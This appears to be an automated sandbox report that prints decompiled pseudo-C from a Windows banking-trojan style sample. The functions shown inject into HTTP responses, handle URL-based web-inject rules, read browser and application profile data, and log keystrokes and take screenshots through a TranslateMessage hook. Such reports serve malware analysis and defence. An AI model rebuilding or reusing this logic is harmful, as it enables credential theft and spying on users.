    			E0040FB10(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
    				char _v20;
    				void* _v24;
    				void* _v28;
    				char _v36;
    				char _v40;
    				signed int _v44;
    				void* _v48;
    				signed int _v52;
    				void* _v56;
    				intOrPtr _v60;
    				void* _v72;
    				void* _v80;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				void* _t99;
    				signed int _t100;
    				signed int _t101;
    				intOrPtr _t103;
    				void* _t104;
    				signed int _t107;
    				signed int _t108;
    				signed int _t110;
    				intOrPtr _t119;
    				void* _t131;
    				signed int _t139;
    				void* _t149;
    				struct _CRITICAL_SECTION* _t153;
    				intOrPtr _t155;
    				signed int _t168;
    				signed int _t174;
    				char _t176;
    				void* _t177;
    				intOrPtr _t179;
    				void* _t182;
    				signed int _t183;
    				intOrPtr _t186;
    				void* _t188;
    				signed int _t189;
    				void* _t191;
    				void* _t192;
    				void* _t193;
    				signed int _t195;
    				void* _t197;
    				void* _t199;
    
    				_t197 = (_t195 & 0xfffffff8) - 0x34;
    				_t99 = E0041CB59();
    				_t179 = _a4;
    				if(_t99 == 0 || _a8 == 0 || _a12 <= 0) {
    					L40:
    					_t100 =  *0x422b00(_t179, _a8, _a12);
    					goto L41;
    				} else {
    					_t153 = 0x422adc;
    					EnterCriticalSection(0x422adc);
    					_t101 = E0040EEAE(_t179);
    					if(_t101 == 0xffffffff) {
    						L39:
    						LeaveCriticalSection(_t153);
    						goto L40;
    					}
    					_t103 = _t101 * 0x38 +  *0x422af8;
    					if( *((intOrPtr*)(_t103 + 0x30)) > 0) {
    						L32:
    						_t182 =  *((intOrPtr*)(_t103 + 0x30)) -  *((intOrPtr*)(_t103 + 0x34));
    						_t85 = _t103 + 0x2c; // -4336332
    						_t173 = _t85;
    						__eflags = _a12 - _t182;
    						_t183 =  <  ? _a12 : _t182;
    						_t104 = E00411D3A(_a8,  *_t85 +  *((intOrPtr*)(_t103 + 0x34)), _t183);
    						 *((intOrPtr*)(_t104 + 0x34)) =  *((intOrPtr*)(_t104 + 0x34)) + _t183;
    						__eflags =  *((intOrPtr*)(_t104 + 0x34)) -  *((intOrPtr*)(_t104 + 0x30));
    						if( *((intOrPtr*)(_t104 + 0x34)) ==  *((intOrPtr*)(_t104 + 0x30))) {
    							E00411DB1(E00411CFE( *_t173), _t173, 0, 0xc);
    						}
    						LeaveCriticalSection(_t153);
    						_t100 = _t183;
    						L41:
    						return _t100;
    					}
    					if( *((intOrPtr*)(_t103 + 0x10)) <= 0) {
    						goto L39;
    					}
    					LeaveCriticalSection(0x422adc);
    					_t107 =  *0x422b00(_t179, _a8, _a12);
    					_t199 = _t197 + 0xc;
    					_v52 = _t107;
    					if(_t107 <= 0xffffffff) {
    						L38:
    						_t100 = _v52;
    						goto L41;
    					}
    					EnterCriticalSection(0x422adc);
    					_t108 = E0040EEAE(_t179);
    					_t174 = _t108;
    					if(_t174 == 0xffffffff) {
    						L35:
    						_push(8);
    						_push(0xffffe890);
    						L36:
    						 *0x422ad8();
    						_v52 = _v52 | 0xffffffff;
    						L37:
    						LeaveCriticalSection(_t153);
    						goto L38;
    					}
    					_t168 = _v52;
    					if(_t168 == 0) {
    						L11:
    						_t176 = _t174 * 0x38 +  *0x422af8;
    						_v36 = _t176;
    						if(_t168 > 0) {
    							E00411D3A( *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t176 + 0x18)), _a8, _t168);
    							 *((intOrPtr*)(_t176 + 0x18)) =  *((intOrPtr*)(_t176 + 0x18)) + _t168;
    						}
    						_t110 = E0040F734(_t156,  &_v20,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t176 + 0x18)));
    						_v52 = _t110;
    						if(_t110 == 1) {
    							_t119 = E0040F8DE( &_v20,  *((intOrPtr*)(_t176 + 0x18)),  *((intOrPtr*)(_t176 + 0x14)), ( &_v48 & 0xffffff00 | _v52 == 0x00000000) & 0x000000ff,  &_v48,  &_v40);
    							_v60 = _t119;
    							if(_t119 == 1) {
    								if(E0041BA1E( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)),  *((intOrPtr*)(_t176 + 4)),  &_v48,  &_v40) != 0) {
    									_t155 = _v40;
    									_t186 = E00411CCE( *((intOrPtr*)(_t176 + 0x18)) -  *((intOrPtr*)(_t199 + 0x3c)) +  *((intOrPtr*)(_t199 + 0x38)) + _t155 + 0x14);
    									_v40 = _t186;
    									if(_t186 != 0) {
    										_t131 = E00411D3A(_t186,  *((intOrPtr*)(_t176 + 0x14)),  *((intOrPtr*)(_t199 + 0x38)));
    										_push(_t155);
    										if(( *(_t199 + 0x30) & 0x00000002) == 0) {
    											E004124A7(_t199 + 0x28);
    											_t188 = E00416CAC(_t186,  *((intOrPtr*)(_t199 + 0x40)), "Content-Length",  &_v36) + _v60;
    											E00411D3A(_t188,  *((intOrPtr*)(_t199 + 0x18)), _t155);
    											_t189 = _t188 + _t155;
    											__eflags = _t189;
    										} else {
    											_push("%x\r\n");
    											_t191 = _t186 + _t131;
    											_t177 = 0xd;
    											_t192 = _t191 + E00412A35(_t131, _t177, _t191);
    											E00411D3A(_t192, _v48, _t155);
    											_t193 = _t192 + _t155;
    											E00411D3A(_t193, "\r\n0\r\n\r\n", 7);
    											_t176 = _v60;
    											_t189 = _t193 + 7;
    										}
    										_t137 =  *((intOrPtr*)(_t176 + 0x18));
    										if( *((intOrPtr*)(_t199 + 0x3c)) !=  *((intOrPtr*)(_t176 + 0x18))) {
    											_t189 = _t189 + E00411D3A(_t189,  *((intOrPtr*)(_t176 + 0x14)) +  *((intOrPtr*)(_t199 + 0x3c)), _t137 -  *((intOrPtr*)(_t199 + 0x3c)));
    										}
    										E00411CFE( *((intOrPtr*)(_t176 + 0x14)));
    										_t139 = _v44;
    										 *((intOrPtr*)(_t176 + 0x14)) = _t139;
    										 *((intOrPtr*)(_t176 + 0x18)) = _t189 - _t139;
    									}
    								}
    								_v44 = _v44 | 0xffffffff;
    								E00411CFE(_v48);
    							}
    							_t153 = 0x422adc;
    						}
    						if(_v52 <= 0) {
    							L29:
    							if(__eflags == 0) {
    								L31:
    								 *((intOrPtr*)(_t176 + 0x2c)) =  *((intOrPtr*)(_t176 + 0x14));
    								 *((intOrPtr*)(_t176 + 0x30)) =  *((intOrPtr*)(_t176 + 0x18));
    								 *((intOrPtr*)(_t176 + 0x34)) = 0;
    								 *((intOrPtr*)(_t176 + 0x14)) = 0;
    								 *((intOrPtr*)(_t176 + 0x18)) = 0;
    								E0041BF3C( *((intOrPtr*)(_t176 + 0x10)),  *((intOrPtr*)(_t176 + 0xc)));
    								_t103 = _v40;
    								 *((intOrPtr*)(_t176 + 0x10)) = 0;
    								 *((intOrPtr*)(_t176 + 0xc)) = 0;
    								goto L32;
    							}
    							__eflags = _v44 - 0xffffffff;
    							if(_v44 != 0xffffffff) {
    								goto L37;
    							}
    							goto L31;
    						} else {
    							if(_v44 != 0) {
    								__eflags = _v52;
    								goto L29;
    							}
    							_push(0);
    							_push(0xffffe892);
    							goto L36;
    						}
    					}
    					_t149 = _t108 * 0x38 +  *0x422af8;
    					_t156 =  *((intOrPtr*)(_t149 + 0x18)) + _t168;
    					_t11 = _t149 + 0x14; // -4336356
    					if(E00411C89( *((intOrPtr*)(_t149 + 0x18)) + _t168, _t11) == 0) {
    						goto L35;
    					}
    					_t168 = _v52;
    					goto L11;
    				}
    			}

    APIs
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • EnterCriticalSection.KERNEL32(00422ADC), ref: 0040FB4C
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FB7A
    • EnterCriticalSection.KERNEL32(00422ADC), ref: 0040FB9E
    • LeaveCriticalSection.KERNEL32(00422ADC,00000000,?,00000000), ref: 0040FDE1
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FE00
      • Part of subcall function 00416CAC: StrCmpNIA.SHLWAPI(00000000,?,?,00000000,?,-00422AF8,?,00000000), ref: 00416D06
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • LeaveCriticalSection.KERNEL32(00422ADC), ref: 0040FE0D
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSection$Leave$Enter$FreeHeapObjectSingleWait
    • String ID: 0$%x$Content-Length
    • API String ID: 4067213518-3838797520
    • Opcode ID: 36166e822732b5ed32df5380d2aba68cc5eadf3fcd596d91f0b1d5285327b382
    • Instruction ID: eaa3ba72823be4c93699e6069b60e580a5e08bd1d37d34cc4a6b3d91dabfa8e0
    • Opcode Fuzzy Hash: 36166e822732b5ed32df5380d2aba68cc5eadf3fcd596d91f0b1d5285327b382
    • Instruction Fuzzy Hash: FD91C171500212AFC720DF25DD41A5A7BB4FF84314F000A3AF951A76A1D778E999CFDA
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 96%
    			E0041BA1E(char __eax, void* __ecx, char* _a4, intOrPtr* _a8, signed int* _a12) {
    				char _v540;
    				char _v800;
    				char _v804;
    				char _v860;
    				struct _SYSTEMTIME _v876;
    				char _v900;
    				signed int _v968;
    				signed int _v980;
    				intOrPtr _v984;
    				intOrPtr _v988;
    				char* _v992;
    				char _v996;
    				void* _v1008;
    				struct _SYSTEMTIME _v1028;
    				signed int _v1032;
    				short _v1036;
    				signed short* _v1040;
    				signed int _v1044;
    				intOrPtr* _v1048;
    				signed int _v1052;
    				signed int _v1056;
    				signed int _v1060;
    				signed int _v1064;
    				char _v1068;
    				intOrPtr _v1072;
    				char _v1076;
    				intOrPtr _v1080;
    				intOrPtr _v1084;
    				void* __ebx;
    				void* __edi;
    				void* __esi;
    				intOrPtr _t158;
    				signed int _t159;
    				intOrPtr _t160;
    				signed int _t168;
    				void* _t188;
    				void* _t199;
    				signed int _t211;
    				signed int _t215;
    				signed int _t218;
    				signed char _t222;
    				signed int _t224;
    				void* _t227;
    				void* _t228;
    				signed int _t229;
    				signed int _t230;
    				signed int _t240;
    				void* _t242;
    				signed int _t250;
    				intOrPtr* _t254;
    				signed int _t255;
    				void* _t257;
    				intOrPtr _t258;
    				short* _t261;
    				void* _t280;
    				intOrPtr* _t286;
    				signed int _t291;
    				long _t294;
    				signed short* _t296;
    				signed short* _t298;
    				signed int _t301;
    				intOrPtr* _t303;
    				signed int _t307;
    				void* _t309;
    
    				_t257 = __ecx;
    				_t309 = (_t307 & 0xfffffff8) - 0x424;
    				_v1032 = _v1032 & 0x00000000;
    				if(__eax == 0) {
    					L52:
    					asm("sbb eax, eax");
    					return  ~0x00000000;
    				} else {
    					_t3 = _t257 + 0x10; // 0x10f
    					_t286 = _t3;
    					_v1048 = _t286;
    					_v1028.wDayOfWeek = __eax;
    					do {
    						_t258 =  *_t286;
    						_t279 =  *(_t286 - 0x10) >> 0x0000000a & 0x00000008;
    						_v1028.wHour = _t279;
    						if(_t258 == 0) {
    							_t254 = _a8;
    							L6:
    							_t259 =  *(_t286 + 4);
    							_v1052 = _v1052 & 0x00000000;
    							_v1064 = _v1064 & 0x00000000;
    							_t158 =  *((intOrPtr*)(_t286 + 8)) + _t259;
    							_v1028.wSecond = _t158;
    							if(_t259 >= _t158) {
    								L35:
    								_t159 =  *(_t286 - 0x10);
    								_t294 = 0;
    								if((_t159 & 0x00000008) != 0 && _v1052 != 0) {
    									if((_t159 & 0x00000200) == 0) {
    										_t255 = E00411F3E(_t159 | 0xffffffff, 0, _a4);
    										__eflags = _t255;
    										if(_t255 != 0) {
    											_t188 = 9;
    											E00419897(_t188,  &_v996);
    											_push(_v1052);
    											E00407CCA(_t259, _t279, __eflags, 0xc9, _t255, 0,  &_v996, _t255);
    											_t309 = _t309 + 0x18;
    											E00411CFE(_t255);
    										}
    									} else {
    										_t280 = 0x3c;
    										E00411DB1( &_v996,  &_v996, 0, _t280);
    										_v992 =  &_v800;
    										_v1008 = _t280;
    										_v988 = 0x103;
    										if(InternetCrackUrlA(_a4, 0, 0,  &_v1008) == 1 && _v992 > 0) {
    											GetSystemTime( &_v1028);
    											_t306 =  &_v876;
    											_t199 = 8;
    											E00419897(_t199,  &_v876);
    											_push(_v1028.wDay & 0x0000ffff);
    											_push(_v1028.wMonth & 0x0000ffff);
    											_push((_v1028.wYear & 0x0000ffff) - 0x7d0);
    											_push( &_v804);
    											E004129F1( &_v876, 0x104,  &_v540, _t306);
    											_t309 = _t309 + 0x14;
    											E00407B20(_t259, 0x104, 2, 0,  &_v540, _v1068, _v1080);
    											_t286 = _v1084;
    										}
    									}
    									E00411CFE(_v1052);
    									_t294 = 0;
    								}
    								if( *((intOrPtr*)(_t286 - 4)) != _t294) {
    									if(( *(_t286 - 0x10) & 0x00000010) == 0) {
    										EnterCriticalSection(0x423a34);
    										E00411CFE( *0x423a4c);
    										_t168 = E0041215C(E00411CFE( *0x423a50) | 0xffffffff,  *((intOrPtr*)(_t286 - 0xc)));
    										 *0x423a4c = _t168;
    										__eflags = _t168 | 0xffffffff;
    										 *0x423a50 = E0041215C(_t168 | 0xffffffff,  *((intOrPtr*)(_t286 - 4)));
    										LeaveCriticalSection(0x423a34);
    										goto L51;
    									}
    									E0041CDE0( &_v860, _t259, 1,  &_v996);
    									if(E00412FA3( &_v900,  *((intOrPtr*)(_t286 - 4)), E0041283B( *((intOrPtr*)(_t286 - 4)))) == 0) {
    										goto L51;
    									}
    									_t261 =  &_v860;
    									do {
    										E00412066( *((intOrPtr*)(_t309 + _t294 + 0xb8)), _t261);
    										_t294 = _t294 + 1;
    										_t261 = _t261 + 4;
    									} while (_t294 < 0x10);
    									 *_t261 = 0;
    									GetLocalTime( &_v876);
    									E00415F81(_t261,  &_v996,  &_v860, 3,  &_v876, 0x10);
    								}
    								goto L51;
    							} else {
    								goto L9;
    								L13:
    								_t279 =  *_t211 & 0x0000ffff;
    								if(_t279 != 4) {
    									_t259 = _t211 + 4;
    									_t218 = E0041AD44(_v1028.wHour, _t211 + 4, 0,  &_v1056, _t279 - 4,  *_t254 + _v1060,  *_a12 - _v1060);
    									__eflags = _t218;
    									if(_t218 == 0) {
    										L33:
    										if(_v1028.wYear < _v1028.wSecond) {
    											_t259 = _v1028.wYear;
    											L9:
    											_t211 = ( *_t259 & 0x0000ffff) + _t259;
    											_t296 = ( *_t211 & 0x0000ffff) + _t211;
    											_v1028.wYear = _t296 + ( *_t296 & 0x0000ffff);
    											_t279 =  *_t259 & 0x0000ffff;
    											_v1036 = _t259;
    											_v1044 = _t211;
    											_v1040 = _t296;
    											if(( *_t259 & 0x0000ffff) != 4) {
    												goto L11;
    											} else {
    												_v1060 = _v1060 & 0x00000000;
    												goto L13;
    											}
    										}
    										_t286 = _v1048;
    										goto L35;
    									}
    									__eflags =  *_v1036 - 4;
    									_t298 = _v1040;
    									if( *_v1036 != 4) {
    										_t54 =  &_v1056;
    										 *_t54 = _v1056 + _v1060;
    										__eflags =  *_t54;
    									} else {
    										_v1060 = _v1056;
    									}
    									L22:
    									_t259 = _v1056 - _v1060;
    									_t222 =  *(_v1048 - 0x10);
    									_t291 = ( *_t298 & 0x0000ffff) - 4;
    									_v1044 = _t259;
    									if((_t222 & 0x00000004) == 0) {
    										__eflags = _t222 & 0x00000008;
    										if((_t222 & 0x00000008) != 0) {
    											_t224 = E00411C89(_t259 + _t291 + _v1064 + 2,  &_v1052);
    											__eflags = _t224;
    											if(_t224 != 0) {
    												_t301 = _v1052;
    												__eflags = _t291;
    												if(_t291 != 0) {
    													E00411D3A(_v1064 + _t301,  &(_v1040[2]), _t291);
    													_t84 =  &_v1076;
    													 *_t84 = _v1076 + _t291;
    													__eflags =  *_t84;
    												}
    												_t279 = _v1044;
    												_t227 = E00411D3A(_v1064 + _t301,  *_t254 + _v1060, _t279);
    												_t259 = _v1060;
    												__eflags =  *(_t259 - 0x10) & 0x00000100;
    												if(( *(_t259 - 0x10) & 0x00000100) == 0) {
    													_t228 = E0041692F(_t227, _t279);
    													_t95 =  &_v1068;
    													 *_t95 = _v1068 + _t228;
    													__eflags =  *_t95;
    													_t254 = _a8;
    												} else {
    													_v1064 = _v1064 + _t279;
    												}
    												_t229 = _v1064;
    												 *((char*)(_t229 + _t301)) = 0xa;
    												_t230 = _t229 + 1;
    												__eflags = _t230;
    												_v1064 = _t230;
    												 *((char*)(_t230 + _t301)) = 0;
    											}
    										}
    									} else {
    										_v1036 =  *_a12 - _t259 + _t291;
    										_t240 = E00411CCE( *_a12 - _t259 + _t291);
    										_v1044 = _t240;
    										if(_t240 != 0) {
    											_t279 = _v1060;
    											_t242 = E00411D3A(E00411D3A(_t240,  *_t254, _v1060) + _v1060,  &(_t298[2]), _t291);
    											_t303 = _a12;
    											_t259 =  *_t254 + _v1080;
    											E00411D3A(_t242 + _t291 + _v1060,  *_t254 + _v1080,  *_t303 - _v1080);
    											E00411CFE( *_t254);
    											_v1072 = _v1072 + 1;
    											 *_t254 = _v1084;
    											 *_t303 = _v1076;
    										}
    									}
    									goto L33;
    								}
    								if( *_t259 != _t279) {
    									_t250 = _v1060;
    								} else {
    									_t250 =  *_a12;
    								}
    								_v1056 = _t250;
    								goto L22;
    								L11:
    								_t215 = E0041AD44(_v1028.wHour, _t259,  &_v1060, 0, _t279 - 4,  *_t254,  *_a12);
    								__eflags = _t215;
    								if(_t215 == 0) {
    									goto L33;
    								}
    								_t298 = _v1040;
    								_t211 = _v1044;
    								_t259 = _v1036;
    								goto L13;
    							}
    						}
    						_v996 = 0x2a3f;
    						_v992 = _t258;
    						_t160 = E0041283B(_t258);
    						_t254 = _a8;
    						_v988 = _t160;
    						_v984 =  *_t254;
    						_t279 = _t279 | 0x00000012;
    						_v980 =  *_a12;
    						_v968 = _t279;
    						if(E00412C82( &_v996) != 0) {
    							goto L6;
    						}
    						L51:
    						_t286 = _t286 + 0x1c;
    						_t150 =  &(_v1028.wDayOfWeek);
    						 *_t150 = _v1028.wDayOfWeek - 1;
    						_v1048 = _t286;
    					} while ( *_t150 != 0);
    					goto L52;
    				}
    			}

    APIs
    • InternetCrackUrlA.WININET(?,00000000,00000000,?), ref: 0041BD07
    • GetSystemTime.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?), ref: 0041BD25
    • GetLocalTime.KERNEL32(?,?,?,00000000,00000001,?,00000000,?,-00422ABC), ref: 0041BE3F
    • EnterCriticalSection.KERNEL32(00423A34,00000000,?,-00422ABC), ref: 0041BE6B
    • LeaveCriticalSection.KERNEL32(00423A34,?,?), ref: 0041BEA8
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: CriticalSectionTime$CrackEnterInternetLeaveLocalSystem
    • String ID: 4:B$?*
    • API String ID: 2400141425-1216665951
    • Opcode ID: af5c2cb6450e6a285a9a9a11972c60d91ea8f1e2381c9d23fbd67db9ac9ff94b
    • Instruction ID: 580f3bbdbe8efc04fc3be9c94e5467b6e3cfd8db111a587e31f8e88b26786b6e
    • Opcode Fuzzy Hash: af5c2cb6450e6a285a9a9a11972c60d91ea8f1e2381c9d23fbd67db9ac9ff94b
    • Instruction Fuzzy Hash: D1E1AEB16083019FC710DF69C980AABB7E5FF88314F004A1EF99597351D778E985CB9A
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 79%
    			E00409608(char* __ecx, char* __edx, void* __eflags) {
    				intOrPtr _v8;
    				char _v12;
    				intOrPtr _v16;
    				char* _v20;
    				char _v24;
    				intOrPtr _v28;
    				intOrPtr _v32;
    				intOrPtr _v36;
    				intOrPtr _v40;
    				char _v64;
    				char _v84;
    				char _v108;
    				char _v152;
    				char _v180;
    				char _v252;
    				short _v766;
    				char _v772;
    				short _v1292;
    				void* __edi;
    				void* __esi;
    				void* _t46;
    				void* _t48;
    				void* _t53;
    				void* _t57;
    				void* _t59;
    				void* _t61;
    				void* _t68;
    				void* _t70;
    				void* _t75;
    				WCHAR* _t100;
    				signed int _t101;
    				WCHAR* _t103;
    				char* _t108;
    				intOrPtr _t109;
    				void* _t112;
    				intOrPtr _t125;
    
    				_t99 = __edx;
    				_t98 = __ecx;
    				E00411DB1( &_v12,  &_v12, 0, 8);
    				_t46 = 0x6a;
    				E00419897(_t46,  &_v252);
    				_t48 = 0x6b;
    				E00419897(_t48,  &_v108);
    				_t100 =  &_v772;
    				_t53 = E00415E26(0x80000001, _t98, _t100,  &_v252,  &_v108, 0x104);
    				if(_t53 != 0xffffffff) {
    					_t115 = _t53;
    					if(_t53 != 0) {
    						ExpandEnvironmentStringsW(_t100,  &_v1292, 0x104);
    						E0040941C(_t99, _t115,  &_v1292,  &_v12);
    						PathRemoveFileSpecW( &_v1292);
    					}
    				}
    				_t101 = 0;
    				if(_v8 != 0) {
    					L14:
    					_t125 = _v8;
    					goto L15;
    				} else {
    					_t57 = 0x6d;
    					E00419897(_t57,  &_v64);
    					_t59 = 0x6e;
    					E00419897(_t59,  &_v152);
    					_t108 =  &_v84;
    					_t61 = 0x6f;
    					E00419897(_t61, _t108);
    					_v24 =  &_v64;
    					_v20 =  &_v152;
    					_v40 = 0x24;
    					_v36 = 0x1a;
    					_v32 = 0x26;
    					_v28 = 0x23;
    					_v16 = _t108;
    					do {
    						_t109 =  *((intOrPtr*)(_t112 + _t101 * 4 - 0x24));
    						__imp__SHGetFolderPathW(0, _t109, 0, 0,  &_v772);
    						if(0 == 0) {
    							_t118 = _t109 - 0x24;
    							if(_t109 == 0x24) {
    								E004093DA(_t118,  &_v772,  &_v12, 0);
    								_v766 = 0;
    							}
    							_t99 =  &_v24;
    							_t98 =  &_v772;
    							E00417437( &_v772,  &_v24, 0, 3, 2, E004095BF,  &_v12, 0, 0, 0);
    						}
    						_t101 = _t101 + 1;
    					} while (_t101 < 4);
    					if(_v8 != 0) {
    						L15:
    						if(_t125 <= 0) {
    							return E00411CFE(_v12);
    						}
    						_push(0xcb);
    						return E00407DEB(_t99, _v12, 0x70);
    					}
    					_t68 = 0x6a;
    					E00419897(_t68,  &_v180);
    					_t70 = 0x6c;
    					E00419897(_t70,  &_v64);
    					_t103 =  &_v772;
    					_t75 = E00415E26(0x80000001, _t98, _t103,  &_v180,  &_v64, 0x104);
    					if(_t75 != 0xffffffff) {
    						_t124 = _t75;
    						if(_t75 != 0) {
    							ExpandEnvironmentStringsW(_t103,  &_v1292, 0x104);
    							E004093DA(_t124,  &_v1292,  &_v12, 1);
    						}
    					}
    					goto L14;
    				}
    			}

    APIs
      • Part of subcall function 00415E26: RegOpenKeyExW.ADVAPI32(80000002,?,00000000,00000001,00000000,00000104,00000000,?,?,0041D7E1,?,?,00000104,.exe,00000000), ref: 00415E3B
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104,?,00000000,00000008), ref: 0040966E
      • Part of subcall function 0040941C: GetPrivateProfileStringW.KERNEL32 ref: 00409453
      • Part of subcall function 0040941C: StrStrIW.SHLWAPI(?,?), ref: 004094DB
      • Part of subcall function 0040941C: StrStrIW.SHLWAPI(?,?), ref: 004094EC
      • Part of subcall function 0040941C: GetPrivateProfileStringW.KERNEL32 ref: 00409508
      • Part of subcall function 0040941C: GetPrivateProfileStringW.KERNEL32 ref: 00409526
    • PathRemoveFileSpecW.SHLWAPI(?), ref: 0040968B
      • Part of subcall function 00411CFE: HeapFree.KERNEL32(00000000,00000000,004134F5,00000000,?,?,?,0041C342,00000000,0041C81E), ref: 00411D11
    • SHGetFolderPathW.SHELL32(00000000,00000024,00000000,00000000,?,?,?,00000104,?,00000000,00000008), ref: 00409701
    • ExpandEnvironmentStringsW.KERNEL32(?,?,00000104,?,?,00000104), ref: 0040979E
    Strings
    Memory Dump Source
    • Source File: 00000001.00000001.636690147.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000001.00000001.636784720.0000000000425000.00000040.00020000.sdmp
    Similarity
    • API ID: PrivateProfileString$EnvironmentExpandPathStrings$FileFolderFreeHeapOpenRemoveSpec
    • String ID: #$$$&
    • API String ID: 1517737059-1941049543
    • Opcode ID: ee73a04a3a1538a47c6cd8fd8870fc9e7318cb7e39b62ca065c76025fa04432e
    • Instruction ID: a5ed6178a4cec787c261ff58a7b3d6418724bc6d2d0a69ef08ed37be3f107547
    • Opcode Fuzzy Hash: ee73a04a3a1538a47c6cd8fd8870fc9e7318cb7e39b62ca065c76025fa04432e
    • Instruction Fuzzy Hash: D1512C72D00219AADF20EBA1DC55FEF77BCAB48314F0005A7B609F7181D7789E858B55
    Uniqueness

    Uniqueness Score: -1.00%

    C-Code - Quality: 91%
    			E00410316(MSG* _a4) {
    				char _v524;
    				char _v780;
    				char _v840;
    				char _v864;
    				short _v884;
    				intOrPtr* _v888;
    				intOrPtr _v900;
    				void* __edi;
    				void* __esi;
    				int _t25;
    				signed int _t27;
    				signed int _t32;
    				void* _t36;
    				intOrPtr _t39;
    				WCHAR* _t45;
    				MSG* _t54;
    				WCHAR* _t65;
    				intOrPtr* _t66;
    				signed int _t67;
    				void* _t69;
    
    				_t69 = (_t67 & 0xfffffff8) - 0x374;
    				_t54 = _a4;
    				if(_t54 == 0 || E0041CB59() == 0) {
    					L20:
    					return TranslateMessage(_t54);
    				} else {
    					_t25 = _t54->message;
    					if(_t25 != 0x201) {
    						__eflags = _t25 - 0x100;
    						if(_t25 != 0x100) {
    							goto L20;
    						}
    						__eflags = _t54->wParam - 0x1b;
    						if(_t54->wParam == 0x1b) {
    							goto L20;
    						}
    						_t27 = GetKeyboardState( &_v780);
    						__eflags = _t27;
    						if(_t27 == 0) {
    							goto L20;
    						}
    						_t32 = ToUnicode(_t54->wParam, _t54->lParam & 0x000000ff,  &_v780,  &_v884, 9, 0);
    						__eflags = _t32;
    						if(_t32 <= 0) {
    							goto L20;
    						}
    						__eflags = _t32 - 1;
    						if(__eflags != 0) {
    							if(__eflags > 0) {
    								L18:
    								__eflags = 0;
    								 *((short*)(_t69 + 0x10 + _t32 * 2)) = 0;
    								_push( &_v884);
    								L19:
    								E00410179();
    								goto L20;
    							}
    							L17:
    							__eflags = _v884 - 0x20;
    							if(_v884 < 0x20) {
    								goto L20;
    							}
    							goto L18;
    						}
    						__eflags = _t54->wParam - 8;
    						if(_t54->wParam != 8) {
    							goto L17;
    						}
    						_push(0x403394);
    						goto L19;
    					}
    					EnterCriticalSection(0x422b14);
    					if( *0x422b0c > 0) {
    						 *0x422b0c =  *0x422b0c + 0xffff;
    						_t36 = 2;
    						E00419897(_t36,  &_v864);
    						_t39 = E0041A6CC( &_v864, 0x1e, 0x1f4);
    						_v900 = _t39;
    						if(_t39 != 0) {
    							E00419897(0,  &_v840);
    							_t65 =  &_v884;
    							E00419897(1, _t65);
    							_t45 =  *0x422b04; // 0x0
    							if(_t45 != 0) {
    								_t65 = _t45;
    							}
    							E004129F1( &_v840, 0x104,  &_v524,  &_v840);
    							_t66 = _v888;
    							E00407C62(0x104, _t66,  &_v524);
    							 *((intOrPtr*)( *_t66 + 8))(_t66, _t65,  *0x423dd0, GetTickCount());
    						}
    					}
    					LeaveCriticalSection(0x422b14);
    					goto L20;
    				}
    			}

    APIs
    • TranslateMessage.USER32(?), ref: 0041046D
      • Part of subcall function 0041CB59: WaitForSingleObject.KERNEL32(00000000,00419A59,19367401,00000001), ref: 0041CB61
    • EnterCriticalSection.KERNEL32(00422B14), ref: 00410350
    • LeaveCriticalSection.KERNEL32(00422B14), ref: 004103F3
      • Part of subcall function 0041A6CC: LoadLibraryA.KERNEL32(gdiplus.dll,00000000,?,00000000), ref: 0041A6FE
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdiplusStartup), ref: 0041A70F
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdiplusShutdown), ref: 0041A71C
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipCreateBitmapFromHBITMAP), ref: 0041A729
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipDisposeImage), ref: 0041A736
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipGetImageEncodersSize), ref: 0041A743
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipGetImageEncoders), ref: 0041A750
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GdipSaveImageToStream), ref: 0041A75D
      • Part of subcall function 0041A6CC: LoadLibraryA.KERNEL32(ole32.dll), ref: 0041A7A5
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateStreamOnHGlobal), ref: 0041A7B0
      • Part of subcall function 0041A6CC: LoadLibraryA.KERNEL32(gdi32.dll), ref: 0041A7C2
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateDCW), ref: 0041A7CD
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateCompatibleDC), ref: 0041A7D9
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,CreateCompatibleBitmap), ref: 0041A7E6
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,GetDeviceCaps), ref: 0041A7F3
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,SelectObject), ref: 0041A800
      • Part of subcall function 0041A6CC: GetProcAddress.KERNEL32(00000000,BitBlt), ref: 0041A80D
